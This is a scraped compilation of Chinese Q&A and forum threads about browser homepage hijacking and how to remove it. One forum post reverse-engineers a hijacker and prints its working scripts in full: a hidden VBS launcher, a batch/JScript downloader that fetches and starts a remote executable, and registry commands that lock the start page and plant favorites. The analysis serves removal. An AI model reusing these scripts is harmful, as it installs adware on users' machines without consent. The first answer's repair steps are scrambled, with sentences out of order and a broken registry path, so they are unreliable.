主页被恶意篡改怎么办_百度知道
主页被恶意篡改怎么办
每次打开IE浏览器我的主页原来是好123，都出现的是那个烦人的网站，盗版的），使用Ctrl+Alt+Delete，在Internet 选项-常规里修改！使用常规方法，今天用光盘安装了一款游戏（大富翁8，根本没有反应，特别烦，根本改不过来,竟然打不开任务管理器！还有个情况就是，然后主页就被改成别的了
可能情况不尽相同，所以大部分的方法都是无效的！谢谢大家，所以选择最早给解答的吧，但真心谢谢每一位给予解答的人。很无奈只能选择一个最佳答案谢谢大家的回答
提问者采纳
运行注册表编辑器（开始－运行－输入regedit），然后展开上述子键：1;Internet Explorer&#92。搞不定就按下面的，打开360选择高级;Default_Page_URL “Default_Page_URL”这个子键的键值即起始页的默认页。点击立即“修复IE”如果可以搞定的话最好，将“Default_Page_URL”子键的键值中的那些篡改网站的网址改掉就行了;Microsoft&#92。以下注册表项可能被修改。2： HKEY_LOCAL_MACHINE\Software\Main&#92，或者将其设置为IE的默认值2种方案可以搞定
提问者评价
谢谢！虽然以上两种方法都没有解决我的问题，但我从中学到了新东西
相关专业回答
你的浏览器被木马劫持了
用360安全卫士8.0正式版。打开360安全卫士软件——点击系统修复， 扫描后点击右下角的“一键修复”此时在右上角有个IE常用设置。在ie常用设置里输入你想要的网址之后锁定浏览器。。 ——点击清理插件，如有恶评插件点击右下角的“立即清理”（清理系统垃圾包括缓存）——再点击查杀木马，使用全盘扫描功能，如发现有威胁的程序，请...
其他类似问题
11人觉得有用
为您推荐：
其他12条回答
//biso://www。还能合并重复进程，使系统启动更快：http:使用IE修复软件如360卫士360卫士下载./mysoft/dx:http://www
1、单击“开始--&运行”，在“运行”窗口中，输入regsvr32 actxprxy.dll，然后“确定”，接着会出现一个信息对话框“DllRegisterServer in actxprxy.dll succeeded”，再次点击“确定”；
2、再次打开“运行”窗口，输入regsvr32 shdocvw.dll，单击“确定”；
3、重新启动Windows系统
http://www.onlinedown.net/soft/74143.htm强力主页修复工具 1.1 下载 - 华军软件园 - 网络工具 - 网络辅助
设定主页的工具软件，能将顽固篡改修正过来
曾经有过主页被恶意改为()的经历，当时，费尽九牛二虎之力，下载了多个工具软件，也未能将之改回来，无奈之下只有重做系统。作为一名计算机老师，因为这个简单问题都没能解决，很是惭愧，于是，下定决心，自己动手写了一个设定主页的工具软件，经过多次测试，都能将顽固篡改修正过来，于是，发布该工具，希望能够帮助同受此害的朋友，以解燃眉之急。(注：建议常上网的朋友还是应该安装杀毒软件和防火墙，这年头，没它可不行。另，该工具是绿色版本，无需安装)
1、可以将主页设置为空
2、可以将主页设置为任意指定的网址
呵呵，首先声明在下不是高手，我也是参考别人的建议，问题确实解决了！楼主说的问题我上两天也遇见了，给我郁闷坏了，试了很多朋友提出的办法都不好使，包括修改什么注册表啊，用超级兔子，360安全卫士等等，几乎所有的都是用了一次，差点就重做系统了，最后用了windows清理助手就解决了，我建议楼主在大点的网站下一个windows清理助手，安装后重启，在安全模式（开机后按f8）下点击打开清理助手扫描系统，而后将结果清理一下即可，最后重启，用杀毒软件杀杀毒，你就会发现原来的主页又回来了，我就是这样做的，请楼主试试吧，有一个朋友和你碰见的是一个网址，用我的办法已经改回来了，所以你也一定没问题的！希望也能帮助你，对了还有要补充的一点就是杀毒最好在安全模式下杀毒！这样会比较彻底一些！！！分给...
使用360进行首页修复,另外如360无法修复的话可使用其他的IE修复工具,你也可以将此站点屏蔽,把这个网站加入屏蔽表中.对于任务管理器无法打开的,我只能建议你把系统给恢复下.因为打不开任务管理器是很恶劣的,你可以使用360的进程管理器,查看是否有无可疑进程,如有,那你的计算机肯定是中了毒,如无,那是其他原因导致的.
个人认为 中毒!
可以先下载一些好的杀毒软件(金山,卡巴斯基,瑞星,诺顿,等)进行查杀病毒
然后下载个360安全浏览器 对于网页木马病毒防范较高
360、超级兔子都可以改
用360安全卫士里面的 强力修复IE
用360安全卫士里面的 强力修复IE 选项搞定
使用防篡改浏览器，强效锁定。
可能是你桌面上的IE快捷方式被篡改了，先将桌面的快捷方式删除，再在开始菜单，或者直接在c盘IE安装目录找到iexeplorer.exe，右击点发送到桌面快捷方式。不妨试试
刚刚操作成功，非常有效：第一步，下载金山卫士；第二步，打开金山卫士，清理垃圾；第三步，确定清理插件。清理完毕后，将主页修改成你想要的。成功！
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁为什么 Chrome 浏览器的主页会被篡改为 hao123 ？遇到这种情况需要如何进行修复？
按投票排序
前几天，突然发现默认浏览器的Chrome的主页被篡改为了hao123。每次第一次打开，都自动跳转到这个网址。自己到网上搜了一下，试了各种方法最终还是无果，本着屌丝懂技术，神都难不住的精神决定自己破掉它。(*^__^*) 嘻嘻……&一& 缩小包围圈1、chrome设置？对chrome中的启动时、外观属性都进行了修改，仍然没有解决问题。2、快捷方式中添加了参数？发现不管是从桌面快捷方式还是直接点击exe文件，chrome主页都被篡改。这就排除了是在桌面快捷方式中的目标栏中添加了hao123网址的缘故。哎，查看一下桌面chrome快捷方式不就得了，整的这麽麻烦。囧。3、chrome.exe被篡改或者chrome配置文件被修改?将chrome的配置文件和可执行文件一同拷贝到虚拟机中，擦，在虚拟机中就没问题。说明问题不在chrome身上。那会是什么问题呢？山重水复疑无路，柳暗花明又一村。转折来了，将chrome.exe重新命名后，再打开浏览器，主页就是设置的，这样就没问题了。测试一下，将firxfox.exe重命名位chrome.exe后，主页也被篡改位流氓导航页。看来chrome.exe是个关键词啊！一个解决方案就这样诞生了，太easy了吧。但是这里面到底隐藏着什么奥秘呢？继续整！&二&我要看代码1．
先上第一个利刃，microsoft旗下的Process Explorer。查看chrome.exe的主进程信息如下，亮点就在下图中。小伙伴们一定看到了Command line下面的编辑框里有我们久违的流氓url吧。这个Comand
line是什么东东？
Windows下常见的创建进程的api就是CreateProcess，这个函数申明如下。其中的第二个参数，就是Command line，在我们这里就是chrome.exe应用程序的参数。该api的详细介绍在。现在的问题就是这个command line是谁传递给chrome.exe进程的？弄清楚这个问题之前，先要搞清楚，windows下，双击或者右键打开应用程序时，该应用程序进程是谁创建的？查阅资料发现，通过双击或者右键打开的应用程序进程都是由explorer.exe这个进程调用CreateProcess创建的。那么，我们的流氓url Command line 就一定是explorer.exe传递给chrome.exe。看来explorer.exe有问题了。测试一下，通过任务管理器中的创建新任务的方式启动chrome就没有流氓导航了。但是通过和虚拟机中的explorer.exe文件对比，发现主机和虚拟机中的两个文件完全相同。Exe运行时不光要加载自身的.exe程序文件，还要依赖一些动态库dll。是不是dll有问题。利刃2上场。2、ollydbg闪亮上场。用od加载explorer.exe运行，查看所依赖的dll。看到有几个可疑的非系统dll，QvodExtend.dll,
QvodWebBase.dll,按理说explorer.exe是不会依赖非系统dll的。想起来，网上说的卸载Qvod可以解决问题。这个怎么能说卸就卸呢？万万不可以的。问题肯定是在调用CreateProcess之前出现的，在当前模块中查找调用CreateProcess的地方，一共有四个点，全部设置断点，然后调试explorer.exe进程？当然时调试失败了。~~~~（&_&）~~~~ 但是重新加载explorer.exe运行，然后查看kernel32.dll的CreateProcess的代码发现了重要的问题。下图就是kernel32.dll中的CreateProcess代码，尼玛不是说好了的CreateProcess将调用CreateProcessInternalW吗？这儿怎么上来直接 jmp
QvodWebB.10008B90？QvodWebB你要闹啥啊！！！看看下面这个正版的CreateProcess吧。至此，整个流程大致出来了。QvodWebBase.dll将kernel32.dll的CreateProcessW代码的前5个字节改为了一条jmp指令，改变了CreateProcess的正常执行流程。实际上，CreateProcessA,CreateInternProcessW,CreateInternProcessA都被注入了相应的跳转指令。&三&深入巢穴 QvodWeb如何随explorer.exe加载，QvodExtend.dll, QvodWebBase.dll到底都做了些什么？先mark，后面接着整。1.先看看QvodExtend.dll, QvodWebBase.dll都导出了些什么函数。下面是QvodWebBase.dll导出的函数。可以看到有InstallWindowsHook钩子函数。下面是QvodWebBase.dll导出的函数。可以看到有InstallWindowsHook钩子函数。同时，用IceSword扫描时发现，QvodExtend.dll还是个BHO。同时，用IceSword扫描时发现，QvodExtend.dll还是个BHO。同时，测试发现如果将QvodExtend.dll重命名后，就不会出现主页被篡改，同时explorer.exe也不会有QvodExtend.dll和QvodWebBase.dll模块。由此可以推断，QvodExtend.dll随explorer.exe或者ieplorer.exe启动时，会向系统注册QvodWebBase.dll中的钩子函数，接着再是加载QvodWebBase.dll时，该dll的DLLMain入口函数会向当前进程注入Jmp指令。反汇编QvodExtend.dll代码可以发现，注册QvodWebBase.dll中的钩子函数的代码至此，整个过程告一段落。至此，整个过程告一段落。解决办法就是删除或者重命名QvodExtend.dll和QvodWebBase.dll。不知道会不会影响qvod,目前不得而知。----------------------------------------------分割线------------------------------------------------------------------------------QvodExtend.dll在其dll_main函数中，判断当前的模块是explorer.exe或者iexplore.exe，若两者都不是则退出；否则读取qvod安装目录下的QvodCfg.ini文件获取
QvodWebBase的版本号，找到 QvodWebBase.dll后调用LoadLibrary加载该模块(加载过程中会向CreteProcessA/W中注入代码，这个代码就是在CreateProcessInteralA调用之前修改comand line参数)，接着调用GetProcAddress获得
QvodWebBase安装钩子的导出函数installwindowshook，并执行该函数，该钩子的类型是WM_CBT。整体流程就是这样。
----------------------------------------------分割线------------------------------------------------------------------------------
该实验的软件版本是QvodPlayer5.17.152.0，目前在最新版本中该问题已经解决。
前两天也中招了。尝试恢复设置、重装chrome、改注册表均无果。最后意外发现解决方法无比简单：删掉桌面上的chrome图标，打开安装文件夹找到chrome.exe,随便改成什么名字.exe,比如baiduwcnm,重新发送到桌面快捷方式，再开这个baiduwcnm.exe就看不到hao123了。我中的这个版本的百度恶意小软件应该是找的电脑里的chrome.exe,让它找不到就好了。虽然简单，李彦宏还是死妈。相貌堂堂的干点什么不好。
这是一种（我见过）比较新的劫持浏览器首页的方式了。它在explorer.exe上注册了一个钩子，然后劫持了主流浏览器的.exe文件名，当启动这些浏览器的exe的时候就自动带一个参数——通常浏览器的主程序都支持通过参数直接打开某个页面。于是会发现浏览器设置里面并没有修改主页，但是还是被劫持了。而且它其实很智障，把浏览器的exe改个名字就不会被它勾住了。是不是这种劫持方式有一个很简单的判断方法，通过一个任务管理器（如果系统自带的不行，那就用ProcessExplorer.exe），找到chrome.exe主进程（ProcessExplorer.exe可以按树状方式查看进程，很容易找到主程序是哪个进程），可以右键查看它的启动参数，如果后面跟了流氓网站，那就是这种劫持方式了。遇到过2次了，第一次稀里糊涂的解决了，第二次找到了解决路径。大概就是用了一个工具（好像是火绒xxxxx吧），查看了explorer.exe被哪些dll注册了钩子，然后一眼就看出来其中一个是某恶意软件的，把那个dll找到以后删掉就行了，顺便还可以通过dll的路径和文件名判断一下是哪家的软件搞的鬼。我两次都是迅雷，口亨。
我的却是小马激活工具给搞的，这么谨慎的人也会中招。。附解决方式
百度chrome被劫持几个小时也找不出答案，谁让hao123被摆渡收购了呢，最后google到了外国人不胜其烦的解决方案（链接1），然后用别人自己做的东西修复了（链接2）链接2可能会被报不受信任，亲测没问题，至少比某管家助手干净多了
长见识了，原来有这么多渠道可以劫持chrome主页。补充下我遇到的情况：我的Chrome被劫持是从使用了HEU_KMS_Activator_v10.0.0.exe后开始的，推测下载的是一个被人动过手脚的版本，然后启动Chrome和IE时被导向到/ ，然后再被重定向hao123
右键开始菜单和快速启动栏的快捷方式可知，是通过修改chrome的启动参数实现的“首页”:删掉后面的链接即可，但是重启后又出现了快捷方式劫持，查找后发现，在windows计划任务中存在一个可疑项，删除后问题解决。删掉后面的链接即可，但是重启后又出现了快捷方式劫持，查找后发现，在windows计划任务中存在一个可疑项，删除后问题解决。
背景：最新版的win10 小马激活
删除系统盘下的oem8文件即可
我的主页是被HEU_KMS_Activator篡改了。解决办法：查看浏览器属性 - 目标，删除最后被篡改上去的网址。文件清理：删除C:\Windows 下的 HEUKMSACTIVITOR 目录注册表清理：删除这两处的Start Page键值[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main][HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main]
我的症状和答主的完全一样！但是就是不知道哪个DLL是元凶，因为我的电脑里没有快播……
我的症状和答主的完全一样！但是也不知道哪个DLL是元凶，因为我的电脑里没有快播，也没有这几个dll
已有帐号？
无法登录？
社交帐号登录查看: 26378|回复: 32
流氓软件导致主页被篡改成的分析，包括解决方法
看诸君一席话，胜读十年书啊。枉我还自以为电脑操作不在话下了呢。嘿嘿
本帖最后由 b41k3r 于
19:14 编辑
看来我疏忽了,没有仔细看代码中的键值位置,这个键值我也在多个恶意软件中见到过,看来坑爹的360只改了主页的设置,那么如果我们来个逆向思维,按照360的办法,把这个键值也更改权限锁定,是不是就可以防止很多恶意软件更改主页呢？
实验证明,完全可以。
本帖子中包含更多资源
才可以下载或查看，没有帐号？
Error????是权限不够？？？？？&
顶你！不过不是我的板块，不能给你加分了……希望你把锁定键值修改权限的办法编辑你这层楼的帖子公布一下，让大家一起学习&
本帖最后由 苏风臣 于
14:41 编辑
& & 如果您没有闲心看完整篇帖子而仅仅是为了寻求解决方法，请直接看最后
& & 今天老妈用电脑升级个软件，结果带进来个不知什么东西，把我主页给改成了臭名昭著的，开始没在意：改了就改了吧，我再改回来吧。
& & 当然，直接把主页改成about:blank肯定是没戏的，不过我也试了一下：万一好使呢？虽然结果不出所料的不好使。
& & 再看一眼360安全卫士的锁定主页——居然还是空白页！解开锁定再锁定上也没用，这不得不说是360失败的地方……
& & 不过这样也确定了，那就是流氓插件绑定的问题了。这个时候如果去注册表说不定会好使，不过有了360，那就用360清理插件吧，我也懒得自己去找注册表……【附：注册表关于IE主页的键值：HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main中的StartPage，直接修改成想要的主页就可以】
& & 清理之后，不出所料有一个差评插件，清理之！之后按照提示重启
& & 可是重启之后发现：NANI?还是不好使？再次清理之！这次就不要重启了，这时发现：主页已经被改回到正常的空白页了，说明360的清理是有效的，可是为什么重启之后又回来了呢？这个时候就可以确定，这家伙在启动项里做了手脚。Win（就是键盘上那个微软的标志，一按会拉开开始菜单的那个按键）+R，输入msconfig，查看启动项：
& & 发现他了！一个叫做kqidong.lnk的启动项，目标指向C:\PROGR~1\qidong\qidong.vbs，这里就要解释一下：如果用过DOS（不是那个CMD批处理，就是DOS系统）的童鞋都会知道，当一个文件夹在电脑中的名字太长时，就会显示为“前几个字母+~+数字编号”的形式，这样目标就确定了：C:\Program Files\qidong\qidong.vbs这个时候其实问题就算是解决了，把这个文件夹C:\Program Files\qidong删除肯定就没问题了，可是拥有求知欲的人永远是蛋疼的，我点了进去：
& & 因为我的电脑设置成了不隐藏系统文件和显示所有文件和文件夹，所以我很轻松的看到了里面所包含的东西：kqidong.zip、qidong.bat、qidong.exe、qidong.vbs、xiazai.bat，其中qidong.exe是winrar 自解压格式，正好我也懒得反编译；我只扫了一眼就确定了：这个东东一定是中国人弄得！（因为用的是汉语拼音……）
先查看那个qidong.vbs，用记事本看看他源码：右键——编辑，发现了里面的内容只有短短三行：
set Cleaner=createobject(&wscript.shell&)
Cleaner.run &qidong.bat&,vbhide
Cleaner.run &xiazai.bat&,vbhide
复制代码
& & 这三行代码的意思仅仅是在隐藏窗体的情况下运行qidong.bat和xiazai.bat两个批处理文件，那再看看这两个的源码吧，先是xiazai.bat，同样右键——编辑：
echo=1/*&nul&@cls
@echo off
call :http &/baiduguangjia/qidong/qidong.exe& &C:\Program Files&\qidong\qidong.exe&
@echo
start && &C:\Program Files&\qidong\qidong.exe
:http
echo Source:& && &&%~1&
echo Destination: &%~f2&
echo Start downloading. . .
cscript -nologo -e:jscript &%~f0& &%~1& &%~2&
echo OK!
goto :eof
*/
var iLocal,iRemote,xPost,sG
iLocal =WScript.Arguments(1);
iRemote = WScript.Arguments(0);
iLocal=iLocal.toLowerCase();
iRemote=iRemote.toLowerCase();
xPost = new ActiveXObject(&Microsoft&+String.fromCharCode(0x2e)+&XMLHTTP&);
xPost.Open(&GET&,iRemote,0);
xPost.Send();
sGet = new ActiveXObject(&ADODB&+String.fromCharCode(0x2e)+&Stream&);
sGet.Mode = 3;
sGet.Type = 1;
sGet.Open();
sGet.Write(xPost.responseBody);
sGet.SaveToFile(iLocal,2);
& & 看不懂？没关系！联系那个文件名和几个网址和地址我们就可以断定：这是用来下载那个自解压文件并解压的，那我们去看看那个自解压文件qidong.exe：右键——用Winrar打开，里面仅仅有着一个qidong.bat，在右面提示着
;下面的注释包含自解压脚本命令
Silent=1
Overwrite=1
复制代码
& & 这里我解释一下：Silent=1是静默状态下解压，不会弹出窗口，而Overwrite=1是如果有同名文件直接替换，保证了不会弹出：“XXX已经存在，是否覆盖”之类的提示来告诉你他在运行。
& & 那么接下来看看qidong.bat，同样“右键——编辑”，可这次就不那么顺利了：里面全是乱码，这怎么办呢？还好我有神器：Notepad++，右键——Edit with Notepad++（UE当然也可以做到同样的事情），这次他就无处躲藏了，请看源码：
%%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a
cls
::设置主页并锁定
@REG ADD &HKEY_CLASSES_ROOT\CLSID\{871C-1069-A2EA-D}\shell\OpenHomePage\Command& /ve /t REG_EXPAND_SZ /d &C:\Program Files\Internet Explorer\iexplore.exe /?10688& /f& &
@reg add &HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main& /v &Start Page& /d &/?10688& /f& &
::添加快捷方式到收藏夹
@echo off&setlocal enabledelayedexpansion
REG QUERY &HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders& /v Favorites &%Temp%\Favorites.txt
for /f &skip=2 tokens=1,2*& %%i in ('find /i &Favorites& %Temp%\Favorites.txt') do (
echo [InternetShortcut] &&%%k\2345网址导航.url&echo URL=&/?10688& &&%%k\2345网址导航.url&del /f /s /q %Temp%\Favorites.txt&nul
)
@echo off&setlocal enabledelayedexpansion
REG QUERY &HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders& /v Favorites &%Temp%\Favorites.txt
for /f &skip=2 tokens=1,2*& %%i in ('find /i &Favorites& %Temp%\Favorites.txt') do (
echo [InternetShortcut] &&%%k\0什么电影都能搜索-你懂的.url&echo URL=&http://www.ks888.net& &&%%k\0什么电影都能搜索-你懂的.url&del /f /s /q %Temp%\Favorites.txt&nul
)
@echo off&setlocal enabledelayedexpansion
REG QUERY &HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders& /v Favorites &%Temp%\Favorites.txt
for /f &skip=2 tokens=1,2*& %%i in ('find /i &Favorites& %Temp%\Favorites.txt') do (
echo [InternetShortcut] &&%%k\1淘宝热卖.url&echo URL=&/go/chn/tbk_channel/channelcode.php?pid=mm__0&eventid=101329& &&%%k\1淘宝热卖.url&del /f /s /q %Temp%\Favorites.txt&nul
)
复制代码
& & 居然连注释都有……这流氓软件的作者还真可爱，正好也省去了多费口舌解释，这样通过开机启动项里面运行的qidong.vbs，即使文件被360干掉了他也能保证每次开机都重新缠上你，果然是“臭牛氓”！
& & 而那个kqidong.zip中装的就是kqidong.lnk则是最开始启动项里面的那个，直接指向C:\Program Files\qidong\qidong.vbs
& & 至此我们已经完整的掌握了这个万恶的的流氓团伙的信息，可以直接干掉他了！
& & 通过随便一个清理插件的工具清理掉插件、之后打开msconfig，ban掉kqidong.lnk这个启动项，再把C盘Program Files下的qidong文件夹删除，这个臭牛氓就被彻底的请出电脑了！不过记得最后一步：把主页改回来，最好去上面给出了注册表项里面查看一下Startpage，是不是已经改过来了，如果没改过来就处理一下吧。
支持原创！（解决问题并分析，值得学习！）.
本帖最后由 苏风臣 于
18:51 编辑
b41k3r 发表于
一个疑问:据我所知,360锁定主页的原理好像是更改HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ ...
他是通过注册表改变了你访问桌面上那个微软给你的那个IE的快捷方式（尽管他没有快捷方式的箭头，他也是个快捷方式），让他直接指向了这个网址，但是事实上你的主页并没有被修改。相信很多人中了流氓软件后都有过这样的经历：就是哪怕在Internet选项里面显示的主页是自己选定的主页，但当我们打开IE，第一个打开的依旧是被篡改过的网页
那么我们做个实验：在C:\Program Files\Internet Explorer找到iexplorer.exe，给他创建一个快捷方式然后右键——属性，在“目标”一栏的引号后面加上一个空格，输入，确定之后打开这个快捷方式，我们就直接打开了百度。而这个和你的主页是什么无关。想象一下，当这样一个快捷方式变成你取代了你常用的快捷方式，以后只要一打开浏览器就显示百度，你以后会不会就认为百度是你的首页了呢？
而第四行代码就是通过一个类似的过程，只不过他是通过注册表修改了最原始的那个没有快捷方式箭头的快捷方式，让你桌面上的那个IE指向他的网站，而当我们习惯性的打开桌面的IE图标第一个打开的网站通常都会认为他就是主页，虽然实际上，你的电脑主页根本就不是他，因为我们如果打开C:\Program Files\Internet Explorer下的iexplorer.exe时打开的就不是这个网址了
至于你说的用注册表编辑器无法写入键值……抱歉，我刚刚实验了一下，我依然可以改变键值，360没敢拦我，没有遇到您说的那种情况
这个给力，谢谢楼主分享
一个疑问:据我所知,360锁定主页的原理好像是更改HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main注册表项的权限,使得除SYSTEM以外的用户都只具有只读权,锁定后用注册表编辑器将无法写入键值,不知这个恶意程序是如何突破这个限制的,从源代码中也没有看到相关代码。
如下:03.::设置主页并锁定
04.@REG ADD &HKEY_CLASSES_ROOT\CLSID\{871C-1069-A2EA-D}\shell\OpenHomePage\Command& /ve /t REG_EXPAND_SZ /d &C:\Program Files\Internet Explorer\iexplore.exe /?10688& /f& &
05.@reg add &HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main& /v &Start Page& /d &/?10688& /f& &
复制代码这些代码只是修改主页,并无其他功能。
不过2345的广告很雷人的
我可以不追究你广告的问题，但是我不能容忍你不看帖子就回复啊!就是在360解决无果的情况下我才亲自上阵来处理的，360要是能做到的话我就省事儿了&
华夏青春 发表于
苏叔，你老人家竟然用360...应该不是360杀软吧。2345主页等于流氓团队？
SP：你身为黑客，竟然不教教你老 ...
我有你那么大……是你没我那么大！反正别叫叔，和别人一样叫苏兄就可以了
我从来不觉得360有什么问题，凭心而论这是个好软件，为很多小白提供了防护和维护自己电脑的简便方法。再说现在很多防火墙还是黑客做的呢，而且熊猫烧香的专杀也是武汉男生自己做的。
俗话说“英雄不问出处，流氓别问岁数”（后一句自动过滤），关键不是他干过什么，而是他正在干什么。现在360的确给了很多人很大的方便，还是个免费软件，而且并没有什么危害，那么在你超过了他、可以拿出比他更好的软件之前，没有任何理由去否定甚至贬低他。如果不喜欢就不用他就得了
另外，一切的工具都得看使用者，像这个东西因为用到了错误的方法，于是乎我们认为他是流氓软件，要删除他，事实上那个xiazai.bat里面的东西完全可以用作一个软件的自动更新上，但是当使用者让它更新流氓软件的时候，它也就成了流氓
好的安全工程师一定是个好黑客，这点是大家都承认的。PS：我总觉得酥胸是个很神奇的东西，哈哈，开玩笑。&
我很疑问哈，加入开机启动项360不会提示吗？我没用360.我不知道啊，求告知&
同意，要不是360，现在很多人的电脑根本就是完全不设防的，全是漏洞木马。杀毒虽有些欠缺，但它也一直在进步，从特征码到云查杀，引擎几次更换.&
苏兄...事实上我也挺支持小周的.是他带领这全国杀软的免费......另外说,管家比360好,,我郁闷.老马抄袭是个好手.管家主要是利用了诱惑,QQ加速的诱惑&
其实，使用金山更简单，它会自动删掉这个批处理，就算删不掉，它也会强行绑定到指定主页（谁叫金山曾经是这方面的大佬）。&
谢谢分享！领教了
Powered by}